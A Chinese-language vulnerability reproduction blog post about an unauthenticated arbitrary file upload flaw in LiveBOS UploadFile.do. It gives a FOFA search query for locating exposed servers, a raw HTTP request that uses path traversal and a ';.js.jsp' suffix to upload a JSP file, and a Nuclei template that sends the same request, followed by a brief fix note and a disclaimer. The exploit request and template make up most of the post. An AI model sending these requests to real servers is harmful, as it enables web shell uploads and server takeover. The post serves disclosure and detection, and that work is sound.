【漏洞复现】LiveBOS UploadFile.do 任意文件上传

没事就要多学习

发布于 2024-08-11 08:40:37

2710

发布于 2024-08-11 08:40:37

文章被收录于专栏：Cyber Security

0x00 漏洞描述

LiveBOS 是顶点软件股份有限公司开发的一个对象型业务架构中间件及其集成开发工具。 LiveBOS UploadFile.do 接口存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。

影响范围

福建顶点软件股份有限公司-LiveBos <= 3.9.0

0x01 测绘工具

fofa: body=“Power by LiveBOS”

0x02 漏洞复现

POST /feed/UploadFile.do;.js.jsp HTTP/1.1 
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
 
---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data; name="file"; filename="/../../../../test.jsp"
Content-Type: image/jpeg
 
<%@ page import="java.io.File" %>
<%
 out.println("test");
 String filePath = application.getRealPath(request.getServletPath());
 new File(filePath).delete();
%>
---WebKitFormBoundaryxegqoxxi--

0x03 Nuclei检测脚本

id: LiveBOS UploadFile.do 任意文件上传

info:
  name: LiveBOS UploadFile.do 任意文件上传
  author: admin
  severity: critical
  description: |
    This template detects a file upload vulnerability that allows for 
    the upload of arbitrary files, including JSP files that can be executed on the server.
  reference:
    - https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

requests:
  - raw:
      - |
        POST /feed/UploadFile.do;.js.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
        Connection: close

        ----WebKitFormBoundaryxegqoxxi
        Content-Disposition: form-data; name="file"; filename="/../../../../test.jsp"
        Content-Type: image/jpeg

        <%@ page import="java.io.File" %>
        <%
         out.println("");
         String filePath = application.getRealPath(request.getServletPath());
         new File(filePath).delete();
        %>
        ----WebKitFormBoundaryxegqoxxi--

    matchers:
      - type: word
        words:
          - "file uploaded successfully"
        part: body

0x04 修复建议

厂商已发布安全修复版本，请及时联系官方售后或客服升级至最新版本,https://www.livebos.com

0x05 免责声明

本文所涉及的任何技术、信息或工具，仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响，均由使用者个人承担责任，与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

原始发表：2024-08-11，如有侵权请联系 cloudcommunity@tencent.com 删除

服务器